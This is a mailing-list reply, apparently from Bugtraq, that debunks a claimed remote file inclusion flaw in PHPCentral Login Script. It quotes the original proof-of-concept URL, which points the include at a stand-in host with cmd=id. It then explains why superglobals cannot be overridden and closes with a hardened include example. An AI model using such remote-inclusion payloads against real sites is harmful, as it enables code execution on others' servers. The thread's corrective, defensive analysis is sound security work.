Re: PHPCentral Login Script Remote Command Execution Vulnerabili
On Sunday 12 August 2007 17:12, rizgar@linuxmail.org wrote:
> include.php ;
>
> Lines 4 ;
>
> include("".$_SERVER[DOCUMENT_ROOT]."/$folder/config.php");
>
> PoC :
>
> http://www.example.com/include.php?_SERVER[DOCUMENT_ROOT]=http://evil.txt?&cmd=id
*Of course* this does not work. Setting register_globals to "On" causes the contents of the "superglobals" ($_SERVER, $_GET, $_COOKIE, etc.) to be registered in the global variable namespace. But the superglobals *themselves* are special. They shadow everything - you cannot define your own $_SERVER array, nor can it be overridden with HTTP GET or POST values. If that were possible, using the superglobals would be useless; all scripts would be vulnerable unless register_globals is off.
PoC:

<?php
// Print the real server value next to the request-supplied one with the same name.
echo '$_SERVER[DOCUMENT_ROOT] = ', $_SERVER['DOCUMENT_ROOT'], "<br/>";
echo '$_GET["_SERVER"][DOCUMENT_ROOT] = ', $_GET['_SERVER']['DOCUMENT_ROOT'], "<br/>";
?>

Outputs:

$_SERVER[DOCUMENT_ROOT] = /home/www/docs
$_GET["_SERVER"][DOCUMENT_ROOT] = /foo

if the query string is _SERVER[DOCUMENT_ROOT]=/foo
========================================
Now, register_globals has defaulted to off ever since PHP 4.2.0. I think it would be fair to let PHP scripts rely on this, and not consider all scripts that don't initialize their variables as vulnerable unless they require register_globals to be on (this is not to say that it's not a good idea to initialize variables).

And it would of course be nice if people posting to Bugtraq actually tested their PoCs first. Can't the moderator spot obvious cases like this, or are all vaguely relevant posts accepted, potentially for public ridicule?
-- 
Magnus Holmgren holmgren@lysator.liu.se
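As an added defender's example that is not part of this thread or of the script under discussion: a rewrite of the include.php line that reads $folder explicitly from $_GET and checks it against an allowlist, so the include no longer depends on register_globals being off. The folder names, the function name and the realpath containment check are assumptions.

```php
<?php
// Added example, not the original include.php: build the config path only
// from an explicitly read, allowlisted request value, never from a bare $folder.
declare(strict_types=1);

// Hypothetical set of folders that legitimately contain a config.php.
const ALLOWED_FOLDERS = ['site', 'admin', 'blog'];

function resolveConfigPath(string $docRoot, $folder): ?string
{
    // Reject missing values and non-string inputs such as folder[]=x.
    if (!is_string($folder) || !in_array($folder, ALLOWED_FOLDERS, true)) {
        return null;
    }
    // realpath() resolves symlinks and ".." segments; the result must still
    // sit inside the document root, and the file must exist.
    $root = realpath($docRoot);
    $path = realpath($docRoot . '/' . $folder . '/config.php');
    if ($root === false || $path === false) {
        return null;
    }
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// $_SERVER['DOCUMENT_ROOT'] is set by the web server and cannot be supplied
// through the query string; $_GET['folder'] is the only untrusted input here.
$config = resolveConfigPath($_SERVER['DOCUMENT_ROOT'], $_GET['folder'] ?? null);
if ($config === null) {
    http_response_code(400);
    exit('invalid folder');
}
require $config;
```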